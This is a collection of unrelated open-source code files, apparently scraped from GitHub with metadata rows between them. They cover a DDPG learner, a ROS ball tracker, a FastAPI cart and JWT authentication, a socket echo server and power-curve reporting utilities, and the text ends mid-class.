actions = C.clip_by_value(actions, self.clip_value_min, self.clip_value_max)
return actions
class DDPGLearner(Learner):
"""This is the learner class of DDPG algorithm, which is used to update the policy net"""
class CriticLossCell(nn.Cell):
"""DDPGLossCell calculates the loss of DDPG algorithm"""
def __init__(self, gamma, target_actor_net, target_critic_net, critic_net):
super(DDPGLearner.CriticLossCell, self).__init__(auto_prefix=True)
self.gamma = gamma
self.target_actor_net = target_actor_net
self.target_critic_net = target_critic_net
self.critic_net = critic_net
self.huber_loss = HuberLoss()
def construct(self, obs, actions, rewards, next_obs, done):
"""calculate the total loss"""
# critic Loss
target_actions = self.target_actor_net(next_obs)
target_q_values = self.target_critic_net(next_obs, target_actions)
# One step td error.
td_targets = rewards + self.gamma * (1.0 - done) * target_q_values
q_values = self.critic_net(obs, actions)
critic_loss = self.huber_loss(td_targets, q_values)
return critic_loss
class ActorLossCell(nn.Cell):
"""ActorLossCell calculates the loss of DDPG algorithm"""
def __init__(self, actor_net, critic_net):
super(DDPGLearner.ActorLossCell, self).__init__(auto_prefix=True)
self.actor_net = actor_net
self.critic_net = critic_net
self.reduce_mean = P.ReduceMean()
def construct(self, obs):
"""calculate the total loss"""
actions = self.actor_net(obs)
q_values = self.critic_net(obs, actions)
actor_loss = -self.reduce_mean(q_values)
return actor_loss
def __init__(self, params):
super().__init__()
gamma = params["gamma"]
self.critic_net = params["critic_net"]
self.actor_net = params["actor_net"]
# optimizer network
critic_optimizer = nn.Adam(
self.critic_net.trainable_params(), learning_rate=params["critic_lr"]
)
actor_optimizer = nn.Adam(
self.actor_net.trainable_params(), learning_rate=params["actor_lr"]
)
# loss network
self.target_actor_net = params["target_actor_net"]
self.target_critic_net = params["target_critic_net"]
critic_loss_cell = self.CriticLossCell(
gamma, self.target_actor_net, self.target_critic_net, self.critic_net
)
actor_loss_cell = self.ActorLossCell(self.actor_net, self.critic_net)
self.critic_train = nn.TrainOneStepCell(critic_loss_cell, critic_optimizer)
self.actor_train = nn.TrainOneStepCell(actor_loss_cell, actor_optimizer)
self.critic_train.set_train(mode=True)
self.actor_train.set_train(mode=True)
# soft update network
factor, interval = params["update_factor"], params["update_interval"]
params = self.actor_net.trainable_params() + self.critic_net.trainable_params()
target_params = (
self.target_actor_net.trainable_params()
+ self.target_critic_net.trainable_params()
)
self.soft_updater = SoftUpdate(factor, interval, params, target_params)
def learn(self, experience):
"""DDPG learners"""
obs, actions, rewards, next_obs, done = experience
critic_loss = self.critic_train(obs, actions, rewards, next_obs, done)
actor_loss = self.actor_train(obs)
# update target network parameters.
self.soft_updater()
return critic_loss + actor_loss
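# Illustrative sketch of the target-network soft update triggered in learn() above. This
# assumes SoftUpdate performs Polyak averaging, target <- (1 - factor) * target + factor * online,
# every `interval` steps; that behaviour is an assumption here, not taken from its source.
def _soft_update_reference(online_params, target_params, factor):
    return [(1.0 - factor) * t + factor * o for o, t in zip(online_params, target_params)]
# e.g. _soft_update_reference([1.0], [0.0], 0.05) == [0.05]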
|
mindspore-lab/mindrl
|
mindspore_rl/algorithm/ddpg/ddpg.py
|
ddpg.py
|
py
| 10,399 |
python
|
en
|
code
| 21 |
github-code
|
6
|
21394429670
|
import numpy as np
import statistics
from scipy import stats
dataset= [5,6,7,5,6,5,7,4,5,5,5,5,7,5,6,6,7,6,6,7,7,7,6,5,6]
#mean value
mean= np.mean(dataset)
#median value
median = np.median(dataset)
#mode value
mode= stats.mode(dataset)
#standard Deviation
Std = statistics.stdev(dataset)
#Variance
Var = statistics.variance(dataset)
print("Mean: ", mean)
print("Median: ", median)
print("Mode: ", mode)
print("Std", Std)
print("Var", Var)
|
lamyanlok/FTDS
|
test.py
|
test.py
|
py
| 447 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4552178157
|
# Local Search Multiple Starts
import sys
import time
sys.path.insert(1, '../stage_01')
sys.path.insert(1, '../')
from utils import corrent_solution_size, objetive_function, read_instance, viable_solution
from local_search import local_search
from semi_greedy import semi_greedy
import config
# Multiple-starts local search: semi-greedy construction (alpha) + first-improvement local search
def multiple_starts_local_search(alpha, timeout):
desks, tests, empty = config.desks, config.tests, config.empty
desk_count = len(desks)
test_count = len(tests)
s_ = viable_solution(desk_count, desk_count, test_count)
value_ = objetive_function(s_)
initial_time = time.time()
current_time = time.time()
execution_time = current_time - initial_time
while execution_time < timeout:
s, _ = semi_greedy(alpha, False)
        s, value = local_search(s, 0, False) # 1 = first improvement
if value < value_:
s_ = s
value_ = value
current_time = time.time()
execution_time = current_time - initial_time
s_, value_ = corrent_solution_size(s_, empty)
return s_, value_
if __name__ == '__main__':
file_name = sys.argv[1]
timeout = int(sys.argv[2])
alpha = float(sys.argv[3])
config.set_timeout(timeout)
read_instance(file_name)
s_, value_ = multiple_starts_local_search(alpha, timeout)
print(s_)
print(value_)
|
guilhermelange/Test-Assignment-Problem
|
stage_02/multiple_starts_local_search_02.py
|
multiple_starts_local_search_02.py
|
py
| 1,452 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35007890164
|
from src.main.python.Solution import Solution
from src.main.python.datastructures.Interval import Interval
# Given a set of non-overlapping intervals, insert a new interval into the intervals (merge if necessary).
#
# You may assume that the intervals were initially sorted according to their start times.
#
# Example 1:
# Given intervals [1,3],[6,9], insert and merge [2,5] in as [1,5],[6,9].
#
# Example 2:
# Given [1,2],[3,5],[6,7],[8,10],[12,16], insert and merge [4,9] in as [1,2],[3,10],[12,16].
#
# This is because the new interval [4,9] overlaps with [3,5],[6,7],[8,10].
class Q057(Solution):
def insert(self, intervals, newInterval):
"""
:type intervals: List[Interval]
:type newInterval: Interval
:rtype: List[Interval]
"""
ans = []
if newInterval:
copy = newInterval
for interval in intervals:
if copy.start <= interval.end and interval.start <= copy.end:
copy.start = min(copy.start, interval.start)
copy.end = max(copy.end, interval.end)
elif copy.end < interval.start:
ans.append(copy)
copy = interval
else:
ans.append(interval)
ans.append(copy)
return ans
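# Self-contained check of the merge logic above (illustration only). The real Interval class
# lives in src.main.python.datastructures; the _I stand-in below only mimics the .start/.end
# attributes the algorithm relies on.
if __name__ == "__main__":
    class _I:
        def __init__(self, start, end):
            self.start, self.end = start, end
        def __repr__(self):
            return "[%d,%d]" % (self.start, self.end)
    # Example 1 from the comment above: [1,3],[6,9] with [2,5] merges to [1,5],[6,9]
    print(Q057().insert([_I(1, 3), _I(6, 9)], _I(2, 5)))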
|
renkeji/leetcode
|
python/src/main/python/Q057.py
|
Q057.py
|
py
| 1,332 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72438613309
|
from fastapi import APIRouter, Body, Depends, Request, status
from fastapi.responses import JSONResponse
from jarvis.db.database import DataBase, get_database
from jarvis.core import config, utils
from jarvis.lib import TwilioHelper
from typing import Dict
from twilio.rest import Client
import jarvis.crud as crud
import jarvis.models as model
import jarvis.core.text_responses as text
router = APIRouter()
twilio_helper = TwilioHelper()
client = Client(config.TWILIO_ACCOUNT_SID, config.TWILIO_ACCOUNT_AUTH_TOKEN)
@router.post("/add")
async def add_item_to_cart(request: Request, db: DataBase = Depends(get_database)):
async with db.pool.acquire() as conn:
body = await request.form()
parsed_body = dict(body)
cart_item = model.CartItem(**parsed_body)
normalized_cart_item = await utils.normalize_cart_item_model(conn, cart_item)
cart_item_name = normalized_cart_item.get("name")
item_quantity = normalized_cart_item.get("quantity")
success_message = text.add_item_success(cart_item_name, item_quantity)
shopping_cart_message = text.shopping_cart_info(1)
msg = "".join([success_message, shopping_cart_message])
return twilio_helper.compose_mesage(msg)
# Make potentially a new helper class that has add item
# because you have to then convert this to a message after etc
# shopping_cart = model.ShoppingCart(**payload)
# return None
@router.get("/menu/{item_type}")
async def get_menu(
item_type: str, db: DataBase = Depends(get_database),
):
async with db.pool.acquire() as conn:
try:
items = await crud.get_all_item_by_type(conn, item_type)
message_list = [utils.item_model_to_message(item) for item in items]
message = "\n".join(message_list)
twilio_message = twilio_helper.compose_mesage(message)
return twilio_message
except UserWarning as warning:
return JSONResponse(
status_code=status.HTTP_202_ACCEPTED, content=str(warning)
)
@router.post("/checkout")
async def checkout_cart(
payload: Dict = Body(...), db: DataBase = Depends(get_database)
):
pass
@router.post("/sms")
async def get_twilio_text():
resp = ":)"
return utils.create_text_response(resp)
@router.get("/test")
async def twilio_test(payload: Dict = Body(...)):
message = client.messages.create(
body="Jarvis test",
messaging_service_sid=config.TWILIO_ACCOUNT_MESSAGING_SID,
to=config.TO_PHONE_NUMBER,
)
return message.sid
|
christian-miljkovic/jarvis
|
jarvis/api/v1/user_endpoint.py
|
user_endpoint.py
|
py
| 2,604 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26420619240
|
from datetime import timedelta, datetime
from typing import Optional
from fastapi import Depends, HTTPException, status
from fastapi.security import OAuth2PasswordBearer
from sqlalchemy.orm import Session
from jose import jwt, JWTError
from app import database, models
from app.schemas import TokenData
from app.config import settings
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="login")
SECRET_KEY = settings.secret_key
ALGORITHM = settings.algorithm
ACCESS_TOKEN_EXPIRE_MINUTES = settings.access_token_expire_minutes
def create_access_token(data: dict, expires_delta: Optional[timedelta] = None):
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
def verify_access_token(token: str, credentials_exception):
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
user_id: str = payload.get("user_id")
if user_id is None:
raise credentials_exception
token_data = TokenData(id=user_id)
except JWTError:
raise credentials_exception
return token_data
def get_current_user(
token: str = Depends(oauth2_scheme), db: Session = Depends(database.get_db)
):
credentials_exception = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Could not validate credentials",
headers={"WWW-Authenticate": "Bearer"},
)
    token_data = verify_access_token(token, credentials_exception)
    user = db.query(models.User).filter(models.User.id == token_data.id).first()
return user
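# Minimal round-trip sketch of the two helpers above (illustration only: the user_id value
# is made up, and this still relies on the app's configured SECRET_KEY / ALGORITHM).
if __name__ == "__main__":
    demo_exc = HTTPException(
        status_code=status.HTTP_401_UNAUTHORIZED,
        detail="Could not validate credentials",
    )
    demo_token = create_access_token({"user_id": 42})
    print(verify_access_token(demo_token, demo_exc))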
|
AdityaPunetha/FastAPI-Full-Devlopment
|
app/oauth2.py
|
oauth2.py
|
py
| 1,771 |
python
|
en
|
code
| 2 |
github-code
|
6
|
8950963065
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
from os import listdir, remove
import datetime as dt
from time import sleep
from MainMethods import getInfo, showDays
from conf import INT, INF, URL, LOC, NINF, LOC2,\
chosenF, errorsF, doneF
"""
Leftover flag files are removed, then the saved-day files
are checked and outdated ones are deleted.
"""
oldflags = [f for f in listdir(LOC2) if f[0]== "F"]
if oldflags:
for f in oldflags:
remove(f"{LOC2}\{f}")
saved= listdir(LOC)
if saved:
saved = [f.split(".csv")[0] for f in saved]
ints = [int(f.split("y")[-1]) for f in saved]
for i, f in enumerate(saved):
if ints[i] < dt.datetime.today().day and max(ints) -ints[i] <9:
remove(f"{LOC}\{f}.csv")
saved.remove(f)
def flagIt():
now = dt.datetime.timestamp(dt.datetime.now())
name = fr"{LOC2}\F{str(int(now))}.txt"
with open(name, "w") as F:
pass
sleep(2)
return name
def unflagIt(name):
remove(name)
def checkWait():
flag = [f for f in listdir(LOC2) if f[0] == "T"]
if flag:
while flag[0] in listdir(LOC2):
print("Wait, Sign Up in process....")
sleep(5)
checkWait()
flag = flagIt()
Chosen = pd.read_csv(chosenF)
Done = pd.read_csv(doneF)[NINF[-2]].to_list()
if Done:
print(f"These SignUps are done and should be confirmed by email:\n"
f"{Chosen[Chosen[NINF[-2]].isin(Done)][[NINF[0], NINF[1], NINF[2]]].to_string(index=False)}\n\n"
f"-------------------------------------------")
Chosen.drop(Chosen[Chosen[NINF[-2]].isin(Done)].index, inplace=True)
pd.DataFrame(columns= NINF).to_csv(doneF, index= False)
ErrorsDF = pd.read_csv(errorsF)
Errors = ErrorsDF[NINF[-2]].to_list()
if Errors:
    print(f"The sign up for these classes failed:\n"
          f"{ErrorsDF.iloc[:, :3]}\n"
          f"Please check manually if you are still interested and "
          f"allow them to be deleted from the program.")
    conf = "n"
    while conf.lower() != "y":
        conf = input("Allow? (y/n):")
        if conf.lower() == "y":
            # Drop the failed sign ups from the pending requests, then clear the errors file
            Chosen.drop(Chosen[Chosen[NINF[-2]].isin(Errors)].index, inplace=True)
            pd.DataFrame(columns=NINF).to_csv(errorsF, index=False)
else:
conf = input("There is no benefit in keeping them !\n"
"Are you sure "
"you don't want to let them go?\n"
"(y/n):")
Chosen.to_csv(chosenF, index= False)
"""
This uses requests and Beautiful Soup to set up
the iterators over the schedule days.
"""
r = requests.get(URL)
soup = BeautifulSoup(r.text, "lxml")
classes = soup.find(id= "classes")
days = classes.find_all(class_= "scheduleDay")[:8]
"""
The following loop gets the basic info from the websites
and keeps it in the dictionary DFs as DataFrames
"""
DFs = {}
for day in days:
date= day["id"]
if date in saved:
continue
DFs[date] = pd.DataFrame(columns= INF)
# iterate over each class in the day
dayclss = day.find_all("div")
for clss in dayclss:
#then within each class I select the link in "schedSignup"
if any(x in clss["class"] for x in INT):
link = clss.find(class_= "schedSignup").a["href"]
inf = getInfo(link)
DFs[date] = DFs[date].append(pd.Series(inf, index= INF), ignore_index=True)
"""
This condition runs the showDays loop to check
each new day's classes for availability and presents the options
"""
num = 0
NewDF = pd.DataFrame(columns= NINF)
if DFs:
result = showDays(DFs, num, NewDF)
NewDF, num = result[0], result[1]
#############
"""
Here, the requests waiting in the 'chosen' csv file
are presented and offered for cancellation
"""
# this sets up the sig file list and the UId counter used for unique signup IDs
sigs= [f for f in listdir(LOC2) if f[:3]== "Sig"]
if sigs:
with open(f"{LOC2}\{sigs[0]}", "r") as s:
UId = int(s.read())
##### Cancel
if Chosen.shape[0]:
print(f"\n============== OPTIONS TO CANCEL ======================\n"
f"These are signups that are waiting to be executed:\n\n"
f"{Chosen.iloc[:,:3]}\n\n"
f"Type in the row number on the left if you want to cancel it, seperate with commas\n"
f"Otherwise, just hit enter and confirm\n")
confirm = "n"
while confirm.lower() != "y":
inp = input("CANCEL:")
if inp:
try:
inp = list(map(int, inp.split(",")))
print(f"cancel these:\n"
f"{Chosen.loc[inp, [NINF[0], NINF[1], NINF[2]]]}")
confirm = input("Confirm (y/n):")
if confirm.lower() == "y":
Chosen.drop(inp, inplace=True)
except:
print(f"There seems to be a mistake in your input,\n"
f"please don't type any unnecessary commas, spaces or words.")
else:
confirm = input("Keep all (y/n):")
"""
If there are newly available classes:
the following while loop will get requests and
add the newly chosen ones to the 'chosen' csv file
It will also give Unique IDs to each class based on
the UId variable retrieved from the Signal File (SigA or SigB)
"""
##### Choose
if num:
print(f"=====================================\n"
f"The column on the RIGHT of each list contains the code to choose the class\n"
f"please type in your choice(s)"
f"(seperate codes with commas if you want multiple, hit enter if you want none.)\n")
confirm = "n"
while confirm.lower() != "y":
choice = input("Choice:")
if choice:
try:
choice = list(map(int,choice.split(",")))
chosen = NewDF[NewDF[NINF[-1]].isin(choice)].copy()
if max(choice) <= NewDF[NINF[-1]].max():
print(f"These are your new choices:\n"
f"{chosen.iloc[:,:3].to_string(index= False)}\n")
if Chosen.shape[0]:
print(f"These are still waiting to be executed:\n"
f"{Chosen.iloc[:, :3].to_string(index=False)}\n")
else:
print(f"There are no signups waiting.")
confirm = input("Confirm (y/n):")
else:
print(f"You may have forgotten a comma or got the wrong number,\n"
f"please try again")
except:
print(f"There seems to be a mistake in your input,\n"
f"please don't type any unnecessary commas, spaces or words.")
else:
print(f"You chose none.")
chosen = pd.DataFrame()
if Chosen.shape[0]:
print(f"These are still waiting to be executed:\n"
f"{Chosen.iloc[:, :3].to_string(index= False)}\n")
else:
print(f"There are no signups waiting.")
confirm = input("Confirm (y/n):")
if chosen.shape[0]:
chosen[NINF[-2]] = [UId +i for i in range(1, chosen.shape[0]+1)]
UId = chosen[NINF[-2]].max()
Chosen = Chosen.append(chosen, ignore_index=True)
# The days and requestes are saved
Chosen.to_csv(chosenF, index= False)
unflagIt(flag)
for d in DFs:
DFs[d].to_csv(fr"{LOC}\{d}.csv", index = False)
# The SigFile is updated
if sigs:
nxtSig = int(sigs[0].split(".")[0][3:])+1
remove(fr"{LOC2}\{sigs[0]}")
with open(fr"{LOC2}\Sig{nxtSig}.txt", "w") as s:
s.write(str(UId))
|
Stryder-Git/Movati_Signup
|
Get_Reqs.py
|
Get_Reqs.py
|
py
| 7,822 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16704619000
|
#!/usr/bin/env python
# Code property of Matteo Scanavino - [email protected]
# Minor changes by Iris David Du Mutel
import rospy
# from std_msgs.msg import Float32MultiArray
from myrobot.msg import vect_msg
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
import cv2
# import cv2.cv
import os
import math
import numpy as np
#import pyrealsense2 as rs
import message_filters
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
import imutils #collection of OpenCV and Python convenience functions
from collections import deque
from scipy.spatial.transform import Rotation as R
def green_ball():
rospy.init_node('realsense_behaviour', anonymous=True)
pub = rospy.Publisher('gb_vect', vect_msg, queue_size=10)
color_sub = message_filters.Subscriber('camera/color/image_raw',Image)
# depth_sub = message_filters.Subscriber('camera/depth/image_raw',Image)
x_sub = message_filters.Subscriber('/odom',Odometry)
ts = message_filters.ApproximateTimeSynchronizer([color_sub, x_sub], queue_size=10,slop=0.1)
ts.registerCallback(callback,pub)
rospy.spin()
def callback(color_raw, x_sub,pub):
vect = [0, 0]
msg = vect_msg()
bridge = CvBridge()
greenLower = (29, 86, 6)
greenUpper = (64, 255, 255)
# realsense min and max distance
try:
color_image = bridge.imgmsg_to_cv2(color_raw, "bgr8")
except CvBridgeError as e:
print(e)
Xest = x_sub
    # Variable assignment:
[yaw, pitch, roll] = get_rotation(Xest)
psi_est = yaw*180/math.pi
frame = imutils.resize(color_image, width=600)
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
mask = cv2.inRange(hsv, greenLower, greenUpper)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# find contours in the mask and initialize the current
# (x, y) center of the ball
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
center = None
if len(cnts) > 0:
# find the largest contour in the mask, then use
# it to compute the minimum enclosing circle and
# centroid
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
if x<280:
vect[0]=90
vect[1]=0
elif x>305:
vect[0]=-90
vect[1]=0
else:
if radius<100:
vect[0]=psi_est
vect[1]=0.8
else:
vect[0]= psi_est
vect[1]=0
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
print(center)
# only proceed if the radius meets a minimum size
if radius > 10:
# draw the circle and centroid on the frame,
# then update the list of tracked points
cv2.circle(frame, (int(x), int(y)), int(radius),
(0, 255, 255), 2)
print('radius=', radius)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
else:
print('out of frame')
# show the frame to our screen
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# Send data
msg.header.stamp = rospy.Time.now()
msg.angle = vect[0]
msg.value = vect[1]
rospy.loginfo('Realsense vector data sent')
pub.publish(msg)
def get_rotation(Xest):
orientation_q = Xest.pose.pose.orientation
orientation_list = [orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w]
r = R.from_quat(orientation_list)
EuAn = r.as_euler('zyx', degrees=False)
return EuAn
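# Quick sanity check of the conversion above (illustration only): the identity quaternion
# [x, y, z, w] = [0, 0, 0, 1] should map to zero yaw/pitch/roll.
def _euler_identity_check():
    return R.from_quat([0.0, 0.0, 0.0, 1.0]).as_euler('zyx', degrees=False)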
if __name__ == '__main__':
try:
green_ball()
except rospy.ROSInterruptException:
pass
|
IrisDuMutel/myrobot
|
scripts/green_ball.py
|
green_ball.py
|
py
| 4,054 |
python
|
en
|
code
| 1 |
github-code
|
6
|
1346892633
|
import threading
import socket
def server_echo (sock):
while True:
conn, addr = sock.accept()
while True:
data = conn.recv(1024)
if not data: break
if data == b"close":
# print ("Close connection")
break
conn.send(data)
# print (data)
conn.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.bind(('127.0.0.1', 2222))
s.bind(('0.0.0.0', 2222))
s.listen(10)
for i in range (10):
pserver = threading.Thread(target=server_echo, name="srv"+str (i+1), args=[s])
pserver.start()
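# Manual client check for the echo server above (illustration only; run from another
# process or terminal). The host/port mirror the bind() call; the message is arbitrary.
def echo_client(message=b"hello"):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as c:
        c.connect(("127.0.0.1", 2222))
        c.send(message)
        reply = c.recv(1024)
        c.send(b"close")  # ask the handler thread to drop this connection
        return reply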
|
gusevna/webserver
|
02_webserver.py
|
02_webserver.py
|
py
| 651 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30497846861
|
import unittest
from main import *
class TestEveryMethodInMain(unittest.TestCase):
def test_GetContainer(self):
self.assertIsNotNone(getPricesContainer())
self.assertIsNotNone(returnListedPricesToServer())
self.assertIsNotNone(returnInOrderedPricesToServer())
#checkPriceDiffWithDatabase
#getSearchedItems
def test_takeMinPriceFromRange(self):
_input = [{"CRL Eastern [Dominus]":{"Normal":{"price":[200,300]}}},{"Alchemist":{"Black":{"price":[2300,2500]}}},{"Overgrowth":{"Titanium White":{"price":[350,450]}},"Dominus":{"Lime":{"price":[4900,5300]}}}]
_output = [{"CRL Eastern [Dominus]":{"Normal":{"price":200}}},{"Alchemist":{"Black":{"price":2300}}},{"Overgrowth":{"Titanium White":{"price":350}},"Dominus":{"Lime":{"price":4900}}}]
self.assertEqual(takeMinPriceFromRange(_input), _output)
self.assertEqual(takeMinPriceFromRange([{"Item": {"paint": {"price":[21,37]}}}]), [{"Item": {"paint": {"price":21}}}])
def test_calculateQuickSellPrice(self):
_input = [{"CRL Eastern [Dominus]":{"Normal":{"price":200}}},{"Alchemist":{"Black":{"price":2300}}},{"Overgrowth":{"Titanium White":{"price":350}},"Dominus":{"Lime":{"price":4900}}}]
_output = [{"CRL Eastern [Dominus]":{"Normal":{"price":100}}},{"Alchemist":{"Black":{"price":2200}}},{"Overgrowth":{"Titanium White":{"price":250}},"Dominus":{"Lime":{"price":4800}}}]
self.assertEqual(calculateQuickSellPrice(_input, 100), _output)
# tests = [{input: [], expected: []},{items: [], expected: []}]
# for test in tests:
# assert(test.expected, takeMinPriceFromRange(test.items))
if __name__ == "__main__":
unittest.main()
|
rekjef/rl-tools
|
Price tracker/tests.py
|
tests.py
|
py
| 1,698 |
python
|
en
|
code
| 0 |
github-code
|
6
|
75188708346
|
# May 10, 1981 00:31
# Gather the input fields
month, day, year, time = input().split()
day = int(day[:-1])
year = int(year)
hour, minute = map(int, time.split(':'))
# Adjust February's day count in leap years
month_name_lst = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
month_days_lst = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
if (year%400 == 0) or (year%4 == 0 and year%100 != 0):
month_days_lst[1] += 1
# Total time in the year (in minutes)
total_time = sum(month_days_lst) * 24 * 60
# Elapsed time so far (in minutes)
current_month_idx = month_name_lst.index(month)
current_time = (sum(month_days_lst[:current_month_idx]) + day-1)*24*60 + hour*60 + minute
print(current_time/total_time*100)
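# Worked check for the sample input in the first comment (illustration only): 1981 is not
# a leap year, so current_time = (31+28+31+30 + 9)*1440 + 31 = 185791 minutes out of
# total_time = 365*1440 = 525600, i.e. roughly 35.348 percent of the year has passed.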
|
zacinthepark/Problem-Solving-Notes
|
boj/1340.py
|
1340.py
|
py
| 765 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
71567925627
|
import os
while True:
info = input().split("-")
if info[0] == 'Create':
file = open(f"files/{info[1]}", "w")
file.close()
elif info[0] == 'Add':
with open(f"files/{info[1]}", "a") as file:
file.write(f"{info[2]}\n")
elif info[0] == 'Replace':
try:
with open(f"files/{info[1]}", "r+") as file:
text = file.readlines()
file = open(f"files/{info[1]}", "w")
for i in range(len(text)):
text[i] = text[i]. replace(info[2], info[3])
file.write("".join(text))
file.close()
except FileNotFoundError:
print("An error occurred")
elif info[0] == 'Delete':
try:
os.remove(f"files/{info[1]}")
except FileNotFoundError:
print("An error occurred")
else:
break
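# Example session (illustration only; the file name is made up). Each command is a single
# dash-separated line, and any unrecognized command ends the loop:
#   Create-notes.txt
#   Add-notes.txt-first line
#   Replace-notes.txt-first-second
#   Delete-notes.txt
#   End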
|
lorindi/SoftUni-Software-Engineering
|
Python-Advanced/7.File Handling/3_file_manipulator.py
|
3_file_manipulator.py
|
py
| 879 |
python
|
en
|
code
| 3 |
github-code
|
6
|
18667310322
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
import sublime, sublime_plugin
from os import path
class GoToPackageFileCommand(sublime_plugin.TextCommand):
def run(self, edit):
f = self.view.file_name()
curFolder = path.dirname(f)
print("Current folder: {0}".format(curFolder))
packagejs = self.find_package_js(curFolder)
if packagejs:
print("Found {0}".format(packagejs))
sublime.active_window().open_file(packagejs)
else:
sublime.status_message("package.js not found in hierarchy of {0}".format(curFolder))
def find_package_js(self, f):
print("Checking '{0}'".format(f))
packagejs = path.join(f, "package.js")
if path.isfile(packagejs):
return packagejs
else:
newF = path.dirname(f)
if newF != f:
return self.find_package_js(newF)
|
Eliga/sublime-update-package-js
|
GoToPackageFile.py
|
GoToPackageFile.py
|
py
| 989 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27099720616
|
import xlwt
import numpy as np
import os
import os.path
import colour
from ..configuration.base_configuration import Filter
from ..configuration.base_configuration import TimeOfDayFilter
from ..core.status import Status
from plots import MatplotlibPlotter
from power_deviation_matrix import PowerDeviationMatrixSheet
import version as ver
def get_valid_excel_sheet_name(sheet_name, if_too_long_replace={}):
max_chars = 31
invalid_chars = ':|\\/*?[]'
for c in invalid_chars:
sheet_name = sheet_name.replace(c, '')
if len(sheet_name) > max_chars:
for sub_str in if_too_long_replace:
sheet_name = sheet_name.replace(sub_str, if_too_long_replace[sub_str])
return sheet_name[:max_chars]
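# Illustration of the sheet-name rules above (the sample name is made up): a 38-character
# name exceeds Excel's 31-character limit, so the replacement map is applied first.
# get_valid_excel_sheet_name("Turbulence Correction Power Deviations",
#                            if_too_long_replace={'Power Deviations': 'PowDevs'})
# -> 'Turbulence Correction PowDevs' (29 characters)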
def chckMake(path):
"""Make a folder if it doesn't exist"""
if not os.path.exists(path):
os.makedirs(path)
class PNGPlotter:
def plot(self, analysis, path):
chckMake(path)
plotter = MatplotlibPlotter(path, analysis)
if analysis.hasActualPower:
plotter.plotPowerCurve(analysis.baseline.wind_speed_column, analysis.actualPower, analysis.allMeasuredPowerCurve, specified_title = 'Warranted', mean_title = 'Measured Mean', gridLines = True)
plotter.plotPowerCurve(analysis.baseline.wind_speed_column, analysis.actualPower, analysis.allMeasuredPowerCurve, show_scatter = False, fname = "PowerCurve - Warranted vs Measured Mean", specified_title = 'Warranted', mean_title = 'Measured Mean', mean_pc_color = 'blue', gridLines = True)
if analysis.turbRenormActive:
plotter.plotTurbCorrectedPowerCurve(analysis.baseline.wind_speed_column, analysis.measuredTurbulencePower, analysis.allMeasuredTurbCorrectedPowerCurve)
if analysis.hasAllPowers:
plotter.plotPowerLimits(specified_title = 'Warranted', gridLines = True)
plotter.plotBy(analysis.windDirection, analysis.hubWindSpeed, analysis.dataFrame, gridLines = True)
plotter.plotBy(analysis.windDirection, analysis.shearExponent, analysis.dataFrame, gridLines = True)
plotter.plotBy(analysis.windDirection, analysis.hubTurbulence, analysis.dataFrame, gridLines = True)
plotter.plotBy(analysis.hubWindSpeed, analysis.hubTurbulence, analysis.dataFrame, gridLines = True)
if analysis.hasActualPower:
plotter.plotBy(analysis.hubWindSpeed, analysis.powerCoeff, analysis.dataFrame, gridLines = True)
plotter.plotBy('Input Hub Wind Speed', analysis.powerCoeff, analysis.allMeasuredPowerCurve, gridLines = True)
if analysis.inflowAngle in analysis.dataFrame.columns:
analysis.dataFrame.loc[analysis.dataFrame[analysis.inflowAngle]>180,analysis.inflowAngle] -= 360
plotter.plotBy(analysis.windDirection,analysis.inflowAngle,analysis.dataFrame, gridLines = True)
plotter.plotCalibrationSectors()
if analysis.hasActualPower:
if analysis.multiple_datasets:
plotter.plot_multiple(analysis.baseline.wind_speed_column, analysis.actualPower, analysis.allMeasuredPowerCurve)
class TimeSeriesExporter:
def export(self, analysis, time_series_path, clean=True, full=True, calibration=True,
full_df_output_dir="TimeSeriesData"):
data_frame = analysis.dataFrame
dataset_configs = analysis.datasetConfigs
if clean:
data_frame.to_csv(time_series_path, sep='\t')
if full:
root_path = os.path.join(os.path.dirname(time_series_path), full_df_output_dir)
chckMake(root_path)
for ds in dataset_configs:
ds.data.fullDataFrame.to_csv(root_path + os.sep + "FilteredDataSet_AllColumns_{0}.dat".format(ds.name),
sep='\t')
if calibration and hasattr(ds.data,"filteredCalibrationDataframe"):
ds.data.filteredCalibrationDataframe.to_csv(
root_path + os.sep + "CalibrationDataSet_{0}.dat".format(ds.name), sep=',')
class Report:
